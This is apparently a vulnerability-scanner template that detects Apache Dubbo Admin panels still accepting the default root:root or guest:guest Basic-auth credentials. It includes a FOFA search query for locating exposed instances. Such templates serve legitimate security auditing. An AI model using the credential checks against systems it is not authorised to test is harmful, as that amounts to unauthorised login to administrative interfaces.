id: dubbo-admin-default-password

info:
    name: Dubbo Admin Default Password
    author: mumu0215(https://github.com/mumu0215)
    severity: high
    verified: true
    description: |
        fofa-query: app="APACHE-dubbo"

set:
    root: "base64('root:root')"
    guest: "base64('guest:guest')"
rules:
    r0:
        request:
            method: GET
            path: /
            headers:
                Authorization: Basic {{root}}
        expression: response.status == 200 && response.body.bcontains(b"<title>Dubbo Admin</title>") && response.body.bcontains(b"'/logout'") && response.body.bcontains(b"/sysinfo/versions")
    r1:
        request:
            method: GET
            path: /
            headers:
                Authorization: Basic {{guest}}
        expression: response.status == 200 && response.body.bcontains(b"<title>Dubbo Admin</title>") && response.body.bcontains(b"'/logout'") && response.body.bcontains(b"/sysinfo/versions")
expression: r0() || r1()
